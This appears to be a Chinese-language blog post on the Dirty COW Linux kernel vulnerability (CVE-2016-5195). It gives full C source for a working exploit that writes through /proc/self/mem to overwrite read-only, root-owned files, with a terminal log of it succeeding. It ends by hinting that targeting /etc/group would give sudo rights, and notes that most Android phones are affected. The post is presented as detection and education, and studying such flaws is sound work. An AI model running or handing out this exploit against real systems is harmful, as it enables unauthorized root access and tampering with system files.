Linux|Linux Dirty COW(脏牛)漏洞介绍及检测 LinuxDirtyCOW(脏牛)漏洞介绍及检

漏洞描述

描述引用来源：https://github.com/dirtycow
*A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. *

Linux内核的内存子系统在处理copy-on-write（COW）时出现竞争条件，导致私有只读存储器映射被破坏。

The bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016. List of patched versions here

这个bug自Linux 2.6.22(发布于 2007 年)存在至今，并于2016年10月18日被修复。点击这里查看已发布补丁的Linux版本。

Linux内核的内存子系统在处理copy-on-write（COW）时出现竞争条件，导致私有只读存储器映射被破坏，可利用此漏洞非法获得读写权限，进而提升权限。

文章图片
Dirty COW 漏洞检测方法

/* * author: http://www.ichunqiu.com/course/56009 * title: 实验1 CVE-2016-5195（脏牛）内核提权漏洞分析 * modify: 天苍野茫 * fileName: dirtycow.c * build: gcc -pthread dirtycow.c -o dirtycow */ #include #include #include #include #include #include #include #include void *map; int f; struct stat st; char *name; int bSuccess = 0; void *madviseThread(void *arg) { char *str; str = (char *)arg; int f = open(str, O_RDONLY); int i = 0, c = 0; char buffer1[1024], buffer2[1024]; int size; lseek(f, 0, SEEK_SET); size = read(f, buffer1, sizeof(buffer1)); while(i < 100000000) { c += madvise(map, 100, MADV_DONTNEED); lseek(f, 0, SEEK_SET); size = read(f, buffer2, sizeof(buffer2)); if(size > 0 && strcmp(buffer1, buffer2)) { printf("Hack success!\n\n"); bSuccess = 1; break; } i++; } close(f); printf("madvise %d\n\n", c); }void *procselfmemThread(void *arg) { char *str; str = (char *)arg; int f = open("/proc/self/mem", O_RDWR); int i = 0, c = 0; while(i < 100000000 && !bSuccess) { lseek(f, (uintptr_t)map, SEEK_SET); c += write(f, str, strlen(str)); i++; } close(f); printf("procselfmem %d \n\n", c); }int main(int argc, char *argv[]) { if(argc < 3) { (void)fprintf(stderr, "%s\n", "usage: dirtycow target_file new_content"); return 1; } pthread_t pth1, pth2; f = open(argv[1], O_RDONLY); fstat(f, &st); name = argv[1]; map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0); printf("mmap %zx\n\n", (uintptr_t)map); pthread_create(&pth1, NULL, madviseThread, argv[1]); pthread_create(&pth2, NULL, procselfmemThread, argv[2]); pthread_join(pth1, NULL); pthread_join(pth2, NULL); close(f); return 0; }

漏洞检测结果平台信息

tiancangyemang@ubuntu:~$ uname -a Linux ubuntu 3.13.0-96-generic #143-Ubuntu SMP Mon Aug 29 20:15:20 UTC 2016 x86_64 x86_64 x86_64 GNU/Linuxtiancangyemang@ubuntu:~$ gcc --version gcc (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4 Copyright (C) 2013 Free Software Foundation, Inc. This is free software; see the source for copying conditions.There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

测试过程编译

tiancangyemang@ubuntu:~$ gcc -pthread dirtycow.c -o dirtycow

准备测试目标

tiancangyemang@ubuntu:~$ echo ABCDEFGHIJKLMN > target.txt tiancangyemang@ubuntu:~$ cat target.txt ABCDEFGHIJKLMN tiancangyemang@ubuntu:~$ chmod 644 target.txt tiancangyemang@ubuntu:~$ sudo chown root:root target.txt [sudo] password for tiancangyemang:tiancangyemang@ubuntu:~$ ls -l target.txt -rw-r--r-- 1 root root 15 10月 30 13:14 target.txt

开始测试

tiancangyemang@ubuntu:~$ cat target.txt ABCDEFGHIJKLMN tiancangyemang@ubuntu:~$ ./dirtycow target.txt 1234567890 mmap 7fa185de3000Hack success!procselfmem 52150 madvise 0tiancangyemang@ubuntu:~$ ls -l target.txt -rw-r--r-- 1 root root 15 10月 30 13:14 target.txttiancangyemang@ubuntu:~$ cat target.txt 1234567890KLMN

结论

由上面的测试数据可知，只要有对target.txt的可读权限，就可以利用Dirty COW漏洞获得读写权限！
若把目标从target.txt改成/etc/group，将自己加入sudo组，你懂的~

补充 【Linux|Linux Dirty COW(脏牛)漏洞介绍及检测】Dirty COW漏洞是一个远古时期的漏洞(2007年，Linux 2.6.22)，影响版本广泛，现在市面上绝大部分 Android 手机的 Linux 版本都大于2.6.22，换言之，目前市面上绝大部分 Android 手机均面临Dirty COW漏洞的威胁！